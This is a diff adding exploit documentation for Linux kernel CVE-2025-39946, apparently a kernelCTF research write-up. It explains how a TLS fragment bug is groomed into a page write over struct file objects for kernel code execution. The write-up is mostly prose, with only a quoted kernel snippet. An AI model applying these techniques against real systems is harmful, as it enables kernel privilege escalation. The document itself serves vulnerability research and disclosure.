|
| 1 | +# CVE-2025-39946 |
| 2 | + |
| 3 | +Exploit documentation for `CVE-2025-39946` against `mitigation-v3b-6.1.55`. |
| 4 | + |
| 5 | +As stated in the `vulnerability.md` documentation, the bug behind |
| 6 | +`CVE-2025-39946` causes use of uninitialized data and potentially out-of-bounds |
| 7 | +accesses. For exploitation we will focus on the uninitialized data in the |
| 8 | +`struct skb_shared_info.frags[]` array. |
| 9 | +TLS manages the first 5 fragments for internal use, however fragments after that |
| 10 | +are accessible to us because of the bug described. |
| 11 | +In order to exploit this, we will first groom the heap so that the next fragment |
| 12 | +has some controlled value. We then try to re-use this fragment page so that we |
| 13 | +can trigger a page write corrupting kernel data. |
| 14 | + |
| 15 | +## Page Write Targets |
| 16 | + |
| 17 | +With the primitive outlined above (essentially a one-shot use-after-free page |
| 18 | +write primitive), we need to find a useful page to write to. |
| 19 | +There are two obvious choices for this: |
| 20 | +- Page tables |
| 21 | +- Slab backing pages |
| 22 | + |
| 23 | +At the time of working on the exploit, page tables seemed to be too unstable due |
| 24 | +to the one-shot nature of the write, which is why we will continue with the slab |
| 25 | +backing pages. In hindsight, page tables were probably a good fit too. |
| 26 | + |
| 27 | +Which slab do we target? Ideally the slab would contain objects that allow |
| 28 | +trivial code execution or other memory write primitives. Additionally the |
| 29 | +objects for the slab should be allocatable without too much noise in other |
| 30 | +slabs, because we do not want to accidently corrupt another slab. |
| 31 | +Finally, we need to ensure that the same pages used for the slab can be allocated |
| 32 | +for for skb fragments. |
| 33 | + |
| 34 | +Considering all of the above, I went for `struct file` objects: |
| 35 | +- They can be allocated rather easily by opening files and we can allocate quite |
| 36 | + many |
| 37 | +- Files are allocated from a dedicated `kmem_cache`, thus we are sure to only |
| 38 | + corrupt file objects aiding stability. |
| 39 | +- Files contain a `f_op` vtable, allowing direct rip control. |
| 40 | +- File slabs are backed by order 0 pages, which can be allocated easily from |
| 41 | + userspace using pipes. |
| 42 | + |
| 43 | +One downside of files is the fact that we cannot allocate files without |
| 44 | +allocating inodes too. This is a problem because every file allocation will |
| 45 | +result in the allocation of a `struct dentry` which essentially means our page |
| 46 | +write might accidently hit a different slab. |
| 47 | + |
| 48 | +## Heap Grooming |
| 49 | + |
| 50 | +In order to get a fragment at the right position we want to have skbs with 6 |
| 51 | +fragments, so that the last fragment can be picked up by the file slab. |
| 52 | +To get the controlled fragments into an skb, we create pipes and fill exactly 5 |
| 53 | +pages. Pipe buffers are backed by order 0 pages which matches the file slab |
| 54 | +`kmem_cache` order. After that we add another partially filled page which will |
| 55 | +be the page used for triggering the overwrite. |
| 56 | +We then splice those pages onto an skb for the expected fragment layout. |
| 57 | + |
| 58 | +The final page needs to be partially filled so that there is some space left to |
| 59 | +write. We will fill the page exactly to the alignment of the `struct file` |
| 60 | +objects in the slab. Thus the next write starts at the next `struct file` |
| 61 | +object, and will corrupt all the files in the rest of the slab. |
| 62 | + |
| 63 | +For increased chance of hitting the right pages, we will repeat the above for |
| 64 | +N (= 16) pipes. We fill all of them and then release the skbs one by one, |
| 65 | +immediatly picking each up with a new `struct tls_strparser`. Since the last |
| 66 | +freed object will be the first on the freelist, it is very likely that the TLS |
| 67 | +socket picks up the prepared skb. |
| 68 | + |
| 69 | +## File Slab Spray |
| 70 | + |
| 71 | +Now that each TLS socket is readily equipped with a prepared skb, we want to |
| 72 | +spray file slabs so that new slabs will pick up pages that were released from |
| 73 | +the pipe buffers earlier. |
| 74 | +For files to allocate we will choose `signalfd`s. Those are a decent choice |
| 75 | +because they are rather simple with a small sized context such that we do not |
| 76 | +allocate new slabs except for the `file` and the `dentry` slab. Furthermore |
| 77 | +`signalfd`s provide an easy to use oracle ([1]) allowing us to check whether we |
| 78 | +corrupted the file structure. |
| 79 | + |
| 80 | +```c |
| 81 | +static int do_signalfd4(int ufd, sigset_t *mask, int flags) |
| 82 | +{ |
| 83 | + struct signalfd_ctx *ctx; |
| 84 | + |
| 85 | + /* ... */ |
| 86 | + |
| 87 | + if (ufd == -1) { |
| 88 | + /* ... */ |
| 89 | + } else { |
| 90 | + struct fd f = fdget(ufd); |
| 91 | + if (!f.file) |
| 92 | + return -EBADF; |
| 93 | + ctx = f.file->private_data; |
| 94 | + if (f.file->f_op != &signalfd_fops) { // [1] |
| 95 | + fdput(f); |
| 96 | + return -EINVAL; |
| 97 | + } |
| 98 | + /* ... */ |
| 99 | +} |
| 100 | +``` |
| 101 | +
|
| 102 | +As mentioned earlier we cannot prevent allocation of `dentry` slabs when |
| 103 | +allocating `signalfd`s. To prevent kernel panics because of corrupted `dentry`s |
| 104 | +we will spray the `signalfd`s in a dedicated forked process which will live |
| 105 | +forever in case we fail to find a corrupted file. This way we prevent any |
| 106 | +accidental oops during cleanup. |
| 107 | +
|
| 108 | +## Triggering the Bug for the Page Write |
| 109 | +
|
| 110 | +Now that we hopefully have a `signalfd` with a file in a slab backed by the page |
| 111 | +we placed into one of the skb fragments, we will trigger the bug as described in |
| 112 | +the `vulnerability.md` document and write our payload for each skb set up. |
| 113 | +
|
| 114 | +For payload choice we will opt for a simple empty file that basically has |
| 115 | +nothing but an `f_op` table that has a `flush` method populated and a reference |
| 116 | +count of 1. When we close the file via `close()` we will reach `filp_close()` |
| 117 | +which gives us RIP control. |
| 118 | +We do not really need the reference count of exactly 1, we just need anything |
| 119 | +greater than zero to bypass checks in `filp_close()`. Actually it is better to |
| 120 | +choose a greater reference count to prevent the file destructor from running. |
| 121 | +Since we will block the kernel in an infinite loop in our flush primitive, we do |
| 122 | +not need to worry about that too much though. |
| 123 | +
|
| 124 | +As a RIP gadget we will utilize the "one gadget" technique described in great |
| 125 | +detail in the [CVE-2025-21700 writeup](https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md). |
| 126 | +Also note that this gadget does not need a KASLR bypass. |
| 127 | +
|
| 128 | +To create the `struct file_operations` pointer we will resort to the previously |
| 129 | +documented deterministically known location of the exception stacks in the CPU |
| 130 | +entry area. This issue has been documented several times (CVE-2023-0597). |
| 131 | +
|
| 132 | +After each write completed, we check each `signalfd` using the oracle described |
| 133 | +above. If any of them got corrupted we trigger our payload by closing the file |
| 134 | +descriptor. |
| 135 | +
|
| 136 | +## Stability Notes |
| 137 | +
|
| 138 | +Special care was taken to make the exploit repeatible if the page reclaim fails. |
| 139 | +It should be close to 80% stable. |
| 140 | +As a side note, the usage of the "one gadget" actually helps with the page |
| 141 | +reclaim because it causes the PCP to drain, thus giving us more reliability in |
| 142 | +the page allocation. |
| 143 | +
|
0 commit comments